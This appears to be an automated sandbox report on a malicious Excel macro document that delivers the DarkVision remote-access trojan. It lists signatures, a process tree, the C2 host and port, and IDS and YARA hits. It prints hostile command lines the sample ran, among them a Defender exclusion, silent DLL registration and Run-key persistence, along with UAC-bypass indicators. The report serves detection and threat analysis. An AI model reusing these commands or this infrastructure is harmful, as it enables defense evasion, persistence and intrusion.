Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO202503D.xlsm

Overview

General Information

Sample name:PO202503D.xlsm
Analysis ID:1635002
MD5:7928d4da38767e17b693dc1c3b12376b
SHA1:b357c6211bbf9b463553d5137aac957fbd9b0868
SHA256:525dca66603ba93785836da140e8bf75d86a71ce828d30797171a3989e1dee51
Tags:xlsmuser-cocaman
Infos:

Detection

DarkVision Rat
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Suricata IDS alerts for network traffic
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
AI detected landing page (webpage, office document or email)
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Uses dynamic DNS services
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Excel Network Connections
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7512 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • 7z.exe (PID: 2028 cmdline: "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.zip" MD5: 9A1DD1D96481D61934DCC2D568971D06)
      • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • regsvr32.exe (PID: 2524 cmdline: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
    • PO202502DAKE.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe" MD5: FD3C8166E7FBBB64D12C1170B8F4BACF)
      • conhost.exe (PID: 1304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5680 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 4068 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • aspnet_wp.exe (PID: 7640 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe" MD5: 10072393B2116AF4483194F101923CA4)
  • cmd.exe (PID: 8344 cmdline: "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502DAKE.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO202502DAKE.exe (PID: 8408 cmdline: "C:\Users\user\SystemRootDoc\PO202502DAKE.exe" MD5: FD3C8166E7FBBB64D12C1170B8F4BACF)
      • conhost.exe (PID: 8416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_wp.exe (PID: 8476 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe" MD5: 10072393B2116AF4483194F101923CA4)
  • cmd.exe (PID: 8528 cmdline: "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502DAKE.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO202502DAKE.exe (PID: 8572 cmdline: "C:\Users\user\SystemRootDoc\PO202502DAKE.exe" MD5: FD3C8166E7FBBB64D12C1170B8F4BACF)
      • conhost.exe (PID: 8588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_wp.exe (PID: 8636 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe" MD5: 10072393B2116AF4483194F101923CA4)
  • cleanup

Malware Configuration

Threatname: DarkVision Rat

{"C2": "myasyncrat.ddns.net", "Port": 3369}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\SystemRootDoc\nasrallah_x86.dllJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
    C:\Users\user\SystemRootDoc\nasrallah_x86.dllJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dllJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
        C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dllJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
            0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x39748:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x39678:$s1: CoGetObject
              • 0x39710:$s2: Elevation:Administrator!new:
              0000000C.00000002.1316214716.00000273D3000000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                0000000C.00000002.1316214716.00000273D3000000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  Click to see the 34 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                    33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                      • 0x38748:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0x38678:$s1: CoGetObject
                      • 0x38710:$s2: Elevation:Administrator!new:
                      16.2.aspnet_wp.exe.140000000.0.raw.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                        16.2.aspnet_wp.exe.140000000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                          Click to see the 31 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Legitimate Application Dropped Archive
                          Source: File createdAuthor: frack113, Florian Roth: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 7512, TargetFilename: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.zip
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, ParentProcessId: 7440, ParentProcessName: PO202502DAKE.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5680, ProcessName: powershell.exe
                          Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                          Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7512, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", ProcessId: 7440, ProcessName: PO202502DAKE.exe
                          Sigma detected: Suspicious Microsoft Office Child Process
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", CommandLine: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7512, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", ProcessId: 2524, ProcessName: regsvr32.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502DAKE.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, ProcessId: 7440, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PO202502DAKE
                          Sigma detected: Excel Network Connections
                          Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 149.137.128.16, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7512, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49722
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, ParentProcessId: 7440, ParentProcessName: PO202502DAKE.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5680, ProcessName: powershell.exe
                          Sigma detected: Suspicious Office Outbound Connections
                          Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49722, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7512, Protocol: tcp, SourceIp: 149.137.128.16, SourceIsIpv6: false, SourcePort: 443
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, ParentProcessId: 7440, ParentProcessName: PO202502DAKE.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5680, ProcessName: powershell.exe
                          Sigma detected: Office Macro File Creation
                          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 7512, TargetFilename: C:\Users\user\Desktop\~$PO202503D.xlsm

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-11T09:14:04.982077+010020283713Unknown Traffic192.168.2.44973713.107.246.60443TCP
                          2025-03-11T09:14:11.705861+010020283713Unknown Traffic192.168.2.44973813.107.246.60443TCP
                          2025-03-11T09:14:11.738304+010020283713Unknown Traffic192.168.2.44973913.107.246.60443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-11T09:13:13.157509+010020456181A Network Trojan was detected192.168.2.44973084.38.129.343369TCP
                          2025-03-11T09:13:14.685727+010020456181A Network Trojan was detected192.168.2.44973184.38.129.343369TCP
                          2025-03-11T09:13:15.482849+010020456181A Network Trojan was detected192.168.2.44973284.38.129.343369TCP
                          2025-03-11T09:13:16.271074+010020456181A Network Trojan was detected192.168.2.44973384.38.129.343369TCP
                          2025-03-11T09:13:17.107375+010020456181A Network Trojan was detected192.168.2.44973484.38.129.343369TCP
                          2025-03-11T09:13:17.897749+010020456181A Network Trojan was detected192.168.2.44973584.38.129.343369TCP
                          2025-03-11T09:14:19.144733+010020456181A Network Trojan was detected192.168.2.44974084.38.129.343369TCP
                          2025-03-11T09:14:20.693296+010020456181A Network Trojan was detected192.168.2.44974184.38.129.343369TCP
                          2025-03-11T09:14:21.485023+010020456181A Network Trojan was detected192.168.2.44974284.38.129.343369TCP
                          2025-03-11T09:14:22.285681+010020456181A Network Trojan was detected192.168.2.44974384.38.129.343369TCP
                          2025-03-11T09:14:23.105771+010020456181A Network Trojan was detected192.168.2.44974484.38.129.343369TCP
                          2025-03-11T09:14:23.892180+010020456181A Network Trojan was detected192.168.2.44974584.38.129.343369TCP
                          2025-03-11T09:15:25.435564+010020456181A Network Trojan was detected192.168.2.44974684.38.129.343369TCP
                          2025-03-11T09:15:26.980852+010020456181A Network Trojan was detected192.168.2.44974784.38.129.343369TCP
                          2025-03-11T09:15:27.769902+010020456181A Network Trojan was detected192.168.2.44974884.38.129.343369TCP
                          2025-03-11T09:15:28.584015+010020456181A Network Trojan was detected192.168.2.44974984.38.129.343369TCP
                          2025-03-11T09:15:29.371709+010020456181A Network Trojan was detected192.168.2.44975084.38.129.343369TCP
                          2025-03-11T09:15:30.165707+010020456181A Network Trojan was detected192.168.2.44975184.38.129.343369TCP
                          2025-03-11T09:16:31.200880+010020456181A Network Trojan was detected192.168.2.44975284.38.129.343369TCP
                          2025-03-11T09:16:32.721864+010020456181A Network Trojan was detected192.168.2.44975384.38.129.343369TCP
                          2025-03-11T09:16:33.519209+010020456181A Network Trojan was detected192.168.2.44975484.38.129.343369TCP
                          2025-03-11T09:16:34.343812+010020456181A Network Trojan was detected192.168.2.44975584.38.129.343369TCP
                          2025-03-11T09:16:35.128035+010020456181A Network Trojan was detected192.168.2.44975684.38.129.343369TCP
                          2025-03-11T09:16:35.911570+010020456181A Network Trojan was detected192.168.2.44975784.38.129.343369TCP
                          2025-03-11T09:17:37.560776+010020456181A Network Trojan was detected192.168.2.44975884.38.129.343369TCP
                          2025-03-11T09:17:39.114159+010020456181A Network Trojan was detected192.168.2.44975984.38.129.343369TCP
                          2025-03-11T09:17:39.937782+010020456181A Network Trojan was detected192.168.2.44976084.38.129.343369TCP
                          2025-03-11T09:17:40.721046+010020456181A Network Trojan was detected192.168.2.44976184.38.129.343369TCP
                          2025-03-11T09:17:41.528004+010020456181A Network Trojan was detected192.168.2.44976284.38.129.343369TCP
                          2025-03-11T09:17:43.330003+010020456181A Network Trojan was detected192.168.2.44976384.38.129.343369TCP
                          2025-03-11T09:18:43.385047+010020456181A Network Trojan was detected192.168.2.44976584.38.129.343369TCP
                          2025-03-11T09:18:44.892855+010020456181A Network Trojan was detected192.168.2.44976684.38.129.343369TCP
                          2025-03-11T09:18:45.674723+010020456181A Network Trojan was detected192.168.2.44976784.38.129.343369TCP
                          2025-03-11T09:18:46.457340+010020456181A Network Trojan was detected192.168.2.44976884.38.129.343369TCP
                          2025-03-11T09:18:47.241808+010020456181A Network Trojan was detected192.168.2.44976984.38.129.343369TCP
                          2025-03-11T09:18:48.060076+010020456181A Network Trojan was detected192.168.2.44977084.38.129.343369TCP
                          2025-03-11T09:19:50.001318+010020456181A Network Trojan was detected192.168.2.44977184.38.129.343369TCP
                          2025-03-11T09:19:51.530639+010020456181A Network Trojan was detected192.168.2.44977284.38.129.343369TCP
                          2025-03-11T09:19:52.340237+010020456181A Network Trojan was detected192.168.2.44977384.38.129.343369TCP
                          2025-03-11T09:19:53.151154+010020456181A Network Trojan was detected192.168.2.44977484.38.129.343369TCP
                          2025-03-11T09:19:53.932851+010020456181A Network Trojan was detected192.168.2.44977584.38.129.343369TCP
                          2025-03-11T09:19:54.749781+010020456181A Network Trojan was detected192.168.2.44977684.38.129.343369TCP
                          2025-03-11T09:20:55.826171+010020456181A Network Trojan was detected192.168.2.44977784.38.129.343369TCP
                          2025-03-11T09:20:57.345135+010020456181A Network Trojan was detected192.168.2.44977884.38.129.343369TCP
                          2025-03-11T09:20:58.146867+010020456181A Network Trojan was detected192.168.2.44977984.38.129.343369TCP
                          2025-03-11T09:20:58.925765+010020456181A Network Trojan was detected192.168.2.44978084.38.129.343369TCP
                          2025-03-11T09:20:59.732838+010020456181A Network Trojan was detected192.168.2.44978184.38.129.343369TCP
                          2025-03-11T09:21:00.509814+010020456181A Network Trojan was detected192.168.2.44978284.38.129.343369TCP
                          2025-03-11T09:22:01.667975+010020456181A Network Trojan was detected192.168.2.44978384.38.129.343369TCP
                          2025-03-11T09:22:03.169886+010020456181A Network Trojan was detected192.168.2.44978484.38.129.343369TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-11T09:13:14.241305+010020456191A Network Trojan was detected192.168.2.44973084.38.129.343369TCP
                          2025-03-11T09:14:20.257458+010020456191A Network Trojan was detected192.168.2.44974084.38.129.343369TCP
                          2025-03-11T09:15:26.529772+010020456191A Network Trojan was detected192.168.2.44974684.38.129.343369TCP
                          2025-03-11T09:16:32.289929+010020456191A Network Trojan was detected192.168.2.44975284.38.129.343369TCP
                          2025-03-11T09:17:38.661675+010020456191A Network Trojan was detected192.168.2.44975884.38.129.343369TCP
                          2025-03-11T09:18:44.462572+010020456191A Network Trojan was detected192.168.2.44976584.38.129.343369TCP
                          2025-03-11T09:19:51.095957+010020456191A Network Trojan was detected192.168.2.44977184.38.129.343369TCP
                          2025-03-11T09:20:56.888841+010020456191A Network Trojan was detected192.168.2.44977784.38.129.343369TCP
                          2025-03-11T09:22:02.742842+010020456191A Network Trojan was detected192.168.2.44978384.38.129.343369TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: PO202503D.xlsmAvira: detected
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\msvcp290.dllAvira: detection malicious, Label: TR/AVI.Agent.bzhgo
                          Source: C:\Users\user\SystemRootDoc\msvcp290.dllAvira: detection malicious, Label: TR/AVI.Agent.bzhgo
                          Found malware configuration
                          Source: 0000000C.00000002.1315965400.000002333C8D5000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: DarkVision Rat {"C2": "myasyncrat.ddns.net", "Port": 3369}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\msvcp290.dllReversingLabs: Detection: 21%
                          Source: C:\Users\user\SystemRootDoc\msvcp290.dllReversingLabs: Detection: 21%
                          Multi AV Scanner detection for submitted file
                          Source: PO202503D.xlsmVirustotal: Detection: 19%Perma Link

                          Exploits

                          barindex
                          Yara detected UAC Bypass using CMSTP
                          Source: Yara matchFile source: 33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.PO202502DAKE.exe.1ff210716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.PO202502DAKE.exe.2333c8716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.PO202502DAKE.exe.2333c8716a0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 33.2.PO202502DAKE.exe.21bc50716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.PO202502DAKE.exe.1ff210716a0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.1316214716.00000273D3000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.1537027703.0000021BC506A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.1452878031.000001FF21000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.1536508110.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.1315965400.000002333C86A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.1537278105.0000025C5A000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.1537027703.0000021BC5000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.1452878031.000001FF2106A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.1315965400.000002333C800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.6605477392.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.1453587554.0000023FB6000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: PO202502DAKE.exe PID: 7440, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_wp.exe PID: 7640, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: PO202502DAKE.exe PID: 8408, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_wp.exe PID: 8476, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: PO202502DAKE.exe PID: 8572, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_wp.exe PID: 8636, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED

                          Phishing

                          barindex
                          AI detected landing page (webpage, office document or email)
                          Source: Screenshot id: 2Joe Sandbox AI: Page contains button: 'View Document' Source: 'Screenshot id: 2'
                          Source: Screenshot id: 2Joe Sandbox AI: Screenshot id: 2 contains prominent button: 'view document'
                          Source: Screenshot id: 5Joe Sandbox AI: Page contains button: 'View Document' Source: 'Screenshot id: 5'
                          Source: Screenshot id: 5Joe Sandbox AI: Screenshot id: 5 contains prominent button: 'view document'
                          Source: Screenshot id: 3Joe Sandbox AI: Page contains button: 'View Document' Source: 'Screenshot id: 3'
                          Source: Screenshot id: 3Joe Sandbox AI: Screenshot id: 3 contains prominent button: 'view document'
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                          Source: unknownHTTPS traffic detected: 149.137.128.16:443 -> 192.168.2.4:49722 version: TLS 1.2
